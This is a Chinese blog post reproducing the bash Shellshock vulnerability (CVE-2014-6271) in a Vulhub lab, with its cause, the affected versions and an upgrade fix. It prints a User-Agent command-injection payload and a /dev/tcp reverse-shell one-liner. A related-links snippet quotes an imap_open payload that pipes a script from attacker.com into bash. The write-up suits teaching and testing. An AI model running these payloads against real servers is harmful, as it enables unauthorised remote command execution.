bash(CVE-2014-6271) shellshock-破壳漏洞复现

最新推荐文章于 2024-05-28 13:53:41 发布
最新推荐文章于 2024-05-28 13:53:41 发布
阅读量517 收藏 1
点赞数 1
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45095113/article/details/128532566
版权

漏洞简介

破壳漏洞(shellshock),也被称为bashdoor,是广泛使用的Unix shell中的一系列安全漏洞,其中第一个漏洞于2014年9月24日被披露。许多面向互联网的服务,如一些网络服务器部署,使用bash来处理某些请求,允许攻击者导致脆弱的bash版本执行任意命令。这可以让攻击者获得对计算机系统的未授权访问。此漏洞源于在调用bash shell之前可以用构造的值创建环境变量。这些变量可以包含代码,在shell被调用后会被立即执行

漏洞成因

bash使用的环境变量是通过函数名称来调用的,导致漏洞出问题是以“(){”开头定义的环境变量在命令ENV中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。核心的原因在于在输入的过滤中没有严格限制边界,没有做合法化的参数判断。

漏洞范围

bash版本小于等于4.3

漏洞复现

1、打开漏洞地址

2、成功正常访问,打开bp进行抓包(同时抓取两个数据包payload)

3、将payload附在User-Agent中,并发送请求

User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id

4、可以看到成功执行了命令,以同样的数据在safe.cgi发送请求,发现其不受影响

5、kali开启端口监听,执行反弹shell命令

 () { :;}; echo;/bin/bash -i >& /dev/tcp/192.168.217.139/4444 0>&1

 6、成功反弹shell

漏洞修复

将bash版本升级到最新版本

浪久1
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Vulhub-Shellshock Remote Command Injection (CVE-2014-6271)
ad12456的博客
05-18 454
Shellshock远程命令注入
Shellshock()系列漏洞简要分析及检测
Traxer的学习之路
03-13 4487
1.漏洞简介2.POC验证2.1 CVE 2014-6271最开始的shell测试脚本如下,主要的代码是第五行,它先使用env命令将() { :;}; echo vulnerable赋值给环境变量x,随后启动一个新的bash进程并执行命令echo test,并将错误信息重定向到null,再查找有无’vulnerable’这个字符串输出,如果输出成功则表示存在漏洞:#!/bin/bash EXITCO
CVE-2014-6271-bash shellshock-漏洞
m0_62008601的博客
08-06 3022
这些变量可以包含代码,在shell被调用后会被立即执行。用docker搭建vulhub漏洞靶场,服务启动后,有两个页面http://192.168.217.134:8080/victim.cgi和http://192.168.217.134:8080/safe.cgi。可以看到错误原因都是permission denied,那就是权限不足的原因了,那我们就修改一下权限,让它能够被访问。既然在victim.cgi可以执行命令,那么应该就可以进行反弹shell了,kali开启端口监听,执行反弹shell命令。.
Bash Bug(漏洞,Shellshock) - CVE-2014-6271
最新发布
HaSaKing的博客
05-28 519
漏洞是对全球数以百万计的系统构成威胁的严重安全漏洞。通过理解其原理并学习如何检测和修补,您可以显著提高自己系统的安全性。始终保持系统和软件的最新状态是保护自己免受此类漏洞攻击的关键策略。
Shellshock Lab
Yuhan2001的CSDN博客
12-05 4082
软件安全课程实验二shellshock; 版本:SeedUbuntu20.04; 课本:计算机安全导论:深度实践;
vulhub漏洞bash(Shellshock CVE-2014-6271)
weixin_43071873的博客
11-27 1248
Shellshock 漏洞 CVE-2014-6271 1.漏洞概述: GNU Bash 4.3及之前版本在评估某些构造的环境变量时存在安全漏洞,向环境变量值内的函数定义后添加多余的字符串会触发此漏洞,攻击者可利用此漏洞改变或绕过环境限制,以执行shell命令。某些服务和应用允许未经身份验证的远程攻击者提供环境变量以利用此漏洞。此漏洞源于在调用bash shell之前可以用构造的值创建环境变量。这些变量可以包含代码,在shell被调用后会被立即执行。 2.漏洞影响:GNU Bash <= 4.3
Bash Shellshock CVE-2014-6271 漏洞
weixin_43144118的博客
11-11 383
Bash Shellshock CVE-2014-6271 漏洞 Bash介绍 Bourne Again Shell(简称BASH)是在GNU/Linux上最流行的SHELL实,于1980年诞生,经过了几十年的进化从一个简单的终端命令行解释器演变成了和GNU系统深度整合的多功能接口。 根据维基百科的描述:Bash,Unix shell的一种。1989年发布第一个正式版本,原先是计划用在GNU...
漏洞(CVE-2014-6271)综合分析1
08-04
漏洞(CVE-2014-6271)综合分析】 一、威胁卡片 漏洞,也称为Bash Shellshock,是由法国的安全研究员Stéphane Chazelas在2014年9月中旬发的。这个漏洞被赋予了CVE编号CVE-2014-6271,属于A级威胁响应...
CVE-2014-7169 漏洞更新
10-23
已成功更新Red Hat Enterprise Linux Server release 5.5 (Tikanga)。
幽灵(GHOST)的高危安全漏洞,GNU Bash 漏洞CVE-2014-6271)
10-09
bash-4.1.2-15.el6_5.2.x86_64.rpm,glibc-2.12-1.149.el6_6.5.x86_64,glibc-common-2.12-1.149.el6_6.5.x86_64.rpm,bash-4.1.2-15.el6_5.2.x86_64.rpm
CVE-2021-25735:利用CVE-2021-25735
05-14
CVE-2021-25735 利用CVE-2021-25735:Kubernetes验证准入Webhook绕过 设置脆弱的环境 让我们从运行脚本gencerts.sh开始以生成TLS证书和密钥。 bash gencerts.sh 要部署接纳控制器,您需要在本地构建Docker容器映像...
Bash Shellshock(Bash远程代码执行)漏洞分析及利用思路
热门推荐
Exploit的小站~
05-10 3万+
 今日爆出一个Bash的RCE漏洞,威力巨大。看了看老外的分析,觉得有必要写一写自己对这个漏洞的理解。 首先,问题起因于一个命令ENV。 原型: env [OPTION]... [NAME=VALUE]... [COMMAND [ARGS]...] Man是这么说的: Display, set, or remove environment variables,Run a comm...
漏洞(CVE-2014-6271)综合分析
Star——Flying in the cyberspace
11-25 2974
目 录 一、 威胁卡片  二、 概述  三、 已知事件发布/披露情况 四、 漏洞的影响范围  五、 漏洞原理  六、 漏洞验证方法  七、 漏洞检测方法  八、 漏洞可能会带来的影响  九、 针对此漏洞的建议  十、 写在最后的啰嗦的话      一、     威胁卡片 二、概述        2014年9月24日Bash被公布存在远程代码执行漏洞,安天实验室
Linux Bash漏洞
weixin_44767073的博客
11-13 1240
Bash是什么? Bourne Again Shell(简称BASH)是在GNU/Linux上最流行的SHELL实,于1980年诞生,经过了几十年的进化从一个简单的终端命令行解释器演变成了和GNU系统深度整合的多功能接口。根据维基百科的描述:Bash,Unix shell的一种。1989年发布第一个正式版本,原先是计划用在GNU操作系统上,但能运行于大多数类Unix系统的操作系统之上,包括Lin...
LINUX漏洞篇之ShellShock漏洞
xf555er的博客
12-06 1039
ShellShock漏洞, 中文称为"漏洞", 是Unix Shell中的安全漏洞在一些网络服务器的部署中, 使用bash来处理某些请求, 允许攻击者通过低版本的bash执行任意Shell命令此漏洞在调用BashShell之前使用payload创建环境变量, 这些环境变量包含Shell代码, 在Shell被调用后代码会被执行bash使用的环境变量是通过函数名称来调用的,以""开头通过环境变量来定义,而在处理这样的恶意的函数环境变量时,并没有以函数结尾 “” 为结束,而是执行其后的恶意shell命令Vul
bash漏洞
aS1424的博客
06-02 936
测试系统有无bash漏洞: env -i X='() { (a)=>\' bash -c 'echo date';cat echo 输出具体日期则为存在bash漏洞 将相关bash*.rpm传至服务器并安装 使用:bash -version查看版本,如为4.几版本,则安装如下三个文件 rpm -Uivh bash-4.1.2-15.el6_5.2.x86_64.rpm rpm -Uivh bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm rpm -
Bash漏洞分析溯源
weixin_47493074的博客
10-01 560
Bash漏洞分析溯源
PHP 输入验证漏洞 CVE-2018-10547
10-24
PHP 输入验证漏洞 CVE-2018-10547是一种远程代码执行漏洞,攻击者可以通过构造恶意IMAP服务器名称来注入任意OS命令语义,从而执行任意代码。以下是漏洞的步骤: 1. 构造恶意IMAP服务器名称,包含“ -oProxyCommand”参数,例如:`127.0.0.1 -oProxyCommand="curl http://attacker.com/malicious.sh|bash"` 2. 在PHP中使用imap_open()函数连接IMAP服务器,将恶意IMAP服务器名称作为参数传入。 3. 当PHP解析恶意IMAP服务器名称时,会执行其中的恶意代码,从而导致远程代码执行漏洞。 为了防止该漏洞的攻击,建议升级openssh到OpenSSH8.4及以上版本,并确保openssl和zlib也已经升级到最新版本。此外,还应该对输入进行严格的验证和过滤,避免恶意输入的注入。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值